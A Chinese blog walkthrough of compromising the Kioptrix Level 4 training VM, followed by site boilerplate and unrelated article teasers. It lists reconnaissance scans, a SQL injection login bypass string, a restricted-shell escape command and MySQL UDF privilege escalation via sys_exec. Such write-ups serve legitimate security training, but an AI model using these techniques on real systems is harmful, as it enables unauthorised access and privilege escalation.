攻破 kioprix level 4 靶机

又又又来了...

法一、

基本步骤

1.确认主机ip,扫描端口确定服务和版本

2.访问网站,扫描目录,查找敏感信息

3.利用敏感信息和SQL注入进入网站

4.ssh服务连接主机

5.shell逃逸并查找敏感信息(与数据库等相关)

6.mysql提权

arp-scan -l

nmap -sS -p- -sV -T4 192.168.5.133

   

dirsearch -u http://192.168.5.133

curl 192.168.5.133

尝试弱口令、万能密码

burp 尝试用户名+密码爆破

没成功,以后要再整理一下字典

根据之前的目录扫描,挖掘信息

能看出来这里创建了 members 表,并写入了 john 的用户数据

以 john 1234 登录

不正确?可能他改了密码?

但可以确定 john 一定存在,先尝试万能密码

1' or '1'='1

下一步横向移动?怎么到后台去呢?

结合之前扫描的 22端口ssh服务,尝试以他的用户名密码进行连接

ssh john@192.168.5.133

连接后发现是低权限用户,且是受限制的shell

参考 渗透技巧——如何逃逸Linux的受限制shell执行任意命令_网易订阅进行shell逃逸

echo os.system('/bin/bash')

 根据该站点的登录情况,应该是开启了mysql服务,查看进程

ps -ef | grep mysql

 且端口为 3306

该网站采用php,搜索php敏感文件查找信息,最好能翻到mysql的账号密码

find / -name "*.php" 2>/dev/null

cat /var/www/rebert/robert.php

尝试一番后找到账号密码,登录

结合linux环境下的MySQL UDF提权_mysql udf提权 linux-CSDN博客对当前john进行提权

mysql -uroot -p

1

查看udf表

select * from mysql.func;

利用sys_exec将john添加到管理员组

select sys_exec('usermod -a -G admin john;);

exit; 退出数据库,sudo su 重登 john,提权成功。

总结

利用信息收集和sql注入获取到john信息,ssh连接,shell逃逸执行命令,查找php文件获取mysql账户密码,利用数据库的UDF提权方式以及sys_exec函数将john账户添加到root组中。

法二、

补充说明

Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/944538.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

20241130 RocketMQ本机安装与SpringBoot整合

20241130 RocketMQ本机安装与SpringBoot整合

目录 一、RocketMQ简介 ???1.1、核心概念 ???1.2、应用场景 ???1.3、架构设计 2、RocketMQ Server安装 3、RocketMQ可视化控制台安装与使用 4、SpringBoot整合RocketMQ实现消息发送和接收? ? ? ? ? 4.1、添加maven依赖 ???4.2、yaml配置 ???4.3、…
阅读更多...
python报错ModuleNotFoundError: No module named ‘visdom‘

python报错ModuleNotFoundError: No module named ‘visdom‘

在用虚拟环境跑深度学习代码时,新建的环境一般会缺少一些库,而一般解决的方法就是直接conda install,但是我在conda install visdom之后,安装是没有任何报错的,conda list里面也有visdom的信息,但是再运行代…
阅读更多...
玩转影刀AI Power-风景小助手教学

玩转影刀AI Power-风景小助手教学

附上该教学网站影刀AI Power帮助文档 - 飞书云文档 影刀AI Power-风景小助手旅游景区大全通过集成AI技术,使得旅游信息的获取和旅游攻略的制定变得更加便捷和个性化,极大地提升了用户的旅游体验。 功能 影刀AI Power-风景小助手旅游景区大全是一款利用…
阅读更多...
yolov5 yolov6 yolov7 yolov8 yolov9目标检测、目标分类 目标切割 性能对比

yolov5 yolov6 yolov7 yolov8 yolov9目标检测、目标分类 目标切割 性能对比

文章目录 YOLOv1-YOLOv8之间的对比如下表所示:一、YOLO算法的核心思想1. YOLO系列算法的步骤2. Backbone、Neck和Head 二、YOLO系列的算法1.1 模型介绍1.2 网络结构1.3 实现细节1.4 性能表现 2. YOLOv2(2016)2.1 改进部分2.2 网络结构 3. YOL…
阅读更多...
电商平台能挡住恶意网络爬虫的攻击吗?

电商平台能挡住恶意网络爬虫的攻击吗?

爬虫盗取电商数据的步骤 爬虫技术作为一种数据获取工具,正逐渐成为电商平台的一大隐患。网络爬虫不仅能够获取商家关键信息并滋生仿冒网站,还能收集用户敏感信息,对用户的财产安全和隐私造成严重威胁。同时,爬虫攻击还会扰乱正常…
阅读更多...
蓝桥杯速成教程{三}(adc,i2c,uart)

蓝桥杯速成教程{三}(adc,i2c,uart)

目录 一、adc 原理图​编辑引脚配置 Adc通道使能配置 实例测试 ​编辑效果显示 案例程序 badc 按键相关函数 测量频率占空比 main 按键的过程 显示界面的过程 二、IIC通信-eeprom 原理图AT24C02 引脚配置 不可用状态,用的软件IIC 官方库移植 At24c02手册 ​编辑…
阅读更多...
小米汽车加速出海,官网建设引领海外市场布局!

小米汽车加速出海,官网建设引领海外市场布局!

面对国内市场的饱和态势,中国企业出海步伐纷纷加速,小米也是其中的一员。Canalys数据显示,2024年第三季度,小米以13.8%的市场份额占比,实现了连续17个季度位居全球前三的成绩。 据“36 氪汽车”报道,小米汽…
阅读更多...
Windows中安装Python3

Windows中安装Python3

Windows中安装Python3 1. 下载Python安装包 首先,访问Python的官方网站 Python.org,选择适合你Windows版本的Python安装包。 2. 运行安装包 下载完成.exe文件后,双击运行安装包。在安装过程中,有一些关键的选项需要特别注意&a…
阅读更多...
从零搭建SpringBoot3+Vue3前后端分离项目基座,中小项目可用

从零搭建SpringBoot3+Vue3前后端分离项目基座,中小项目可用

文章目录 1. 后端项目搭建 1.1 环境准备1.2 数据表准备1.3 SpringBoot3项目创建1.4 MySql环境整合,使用druid连接池1.5 整合mybatis-plus 1.5.1 引入mybatis-plus1.5.2 配置代码生成器1.5.3 配置分页插件 1.6 整合swagger3(knife4j) 1.6.1 整…
阅读更多...
支持最新 mysql9的workbench8.0.39 中文汉化教程来了

支持最新 mysql9的workbench8.0.39 中文汉化教程来了

之前在 B 站上发布了 mysql8 workbench 汉化教程,一年多来帮助很多初学者解决了不熟悉英文的烦恼。 汉化视频可以访问: 2024最新版mysql8.0.39中文版mysql workbench汉化 中文升级 旧版汉化报错解决_哔哩哔哩_bilibili MySql Workbench汉化_哔哩哔哩_…
阅读更多...
JavaWeb期末复习

JavaWeb期末复习

目录 学习通题目Web技术与应用(2024秋)第二章 绪论课前测试一.选择题二.填空题 课后巩固 第三章 HTML基础课前测试一.单选题二.填空题 课后巩固一.单选题二.填空题 第四章 CSS课前测试二.单选题三.填空题 4.5 浮动与清理一.单选题 课后巩固二.单选题 第五…
阅读更多...
云手机与Temu矩阵:跨境电商运营新引擎

云手机与Temu矩阵:跨境电商运营新引擎

云手机与 Temu 矩阵结合的基础 云手机技术原理 云手机基于先进的 ARM 虚拟化技术,在服务器端运行 APP。通过在服务器上利用容器虚拟化软件技术,能够虚拟出多个独立的手机操作系统实例,每个实例等同于一部单独的手机,可独立运行各…
阅读更多...
【每日学点鸿蒙知识】Text填充父控件、Native接收数组、js逻辑不执行问题、UIAbility上下文问题、页面跳转路由栈

【每日学点鸿蒙知识】Text填充父控件、Native接收数组、js逻辑不执行问题、UIAbility上下文问题、页面跳转路由栈

1、HarmonyOS 如何使Text组件填充满父组件? build() {Row() {Row() {Text(this.str).constraintSize({ maxWidth: 100%, minHeight: "30vp" }).backgroundColor(Color.Gray).fontSize(24vp)}.key(row1).constraintSize({ maxWidth: 100%}).backgroundCol…
阅读更多...
Sqoop的使用

Sqoop的使用

每个人的生活都是一个世界,即使最平凡的人也要为他那个世界的存在而战斗。 ——《平凡的世界》 目录 一、sqoop简介 1.1 导入流程 1.2 导出流程 二、使用sqoop 2.1 sqoop的常用参数 2.2 连接参数列表 2.3 操作hive表参数 2.4 其它参数 三、sqoop应用 - 导入…
阅读更多...
基于Java+Springboot+Vue开发的旅游景区管理系统,实习作品

基于Java+Springboot+Vue开发的旅游景区管理系统,实习作品

项目简介 该项目是基于JavaSpringbootVue开发的旅游景区管理系统(前后端分离),这是一项为大学生课程设计作业而开发的项目。该系统旨在帮助大学生学习并掌握Java编程技能,同时锻炼他们的项目设计与开发能力。通过学习基于Java的旅…
阅读更多...
十二月第五周python

十二月第五周python

第一个程序,熟悉转换器,把加法计算器变成exe# // 1,制作加法计算器, # 输入两个数字得到相加结果并输出aint(input("输入数字:"))#int()是把输入的内容转换成整数, bint(input("输入数字:&…
阅读更多...
【视觉惯性SLAM:十一、ORB-SLAM2:跟踪线程】

【视觉惯性SLAM:十一、ORB-SLAM2:跟踪线程】

跟踪线程是ORB-SLAM2的核心之一,其主要任务是实时跟踪相机的位姿变化和场景的变化,以维持地图的更新和相机轨迹的估计。ORB-SLAM2的跟踪线程通过多种方式(参考关键帧跟踪、恒速模型跟踪、重定位跟踪、局部地图跟踪)处理跟踪丢失、…
阅读更多...
在字节5年被优化,太难了。。。

在字节5年被优化,太难了。。。

先简单说下,涵哥是某不知名 985 的本硕,17 年毕业加入字节,以“人员优化”的名义无情被裁员,之后跳槽到了有赞,一直从事软件测试的工作。还差几个月也7年了吧,算是在这行的资深划水员。7年的时间也让涵哥从…
阅读更多...
阿里云-将旧服务器数据与配置完全迁移至新服务器

阿里云-将旧服务器数据与配置完全迁移至新服务器

文章目录 一:创建镜像二:将创建好的镜像复制到新服务器所在的目标地域(如果新服务器与镜像在同一地域就不用进行这一操作)三:将镜像配置到新服务器上四:导出安全组(如果新服务器与旧服务器使用同…
阅读更多...
Spark SQL DML语句

Spark SQL DML语句

【图书介绍】《Spark SQL大数据分析快速上手》-CSDN博客 《Spark SQL大数据分析快速上手》【摘要 书评 试读】- 京东图书 Spark本地模式安装_spark3.2.2本地模式安装-CSDN博客 DML(Data Manipulation Language,数据操作语言)操作主要用来对…
阅读更多...
最新文章

Copyright @ 2022~2023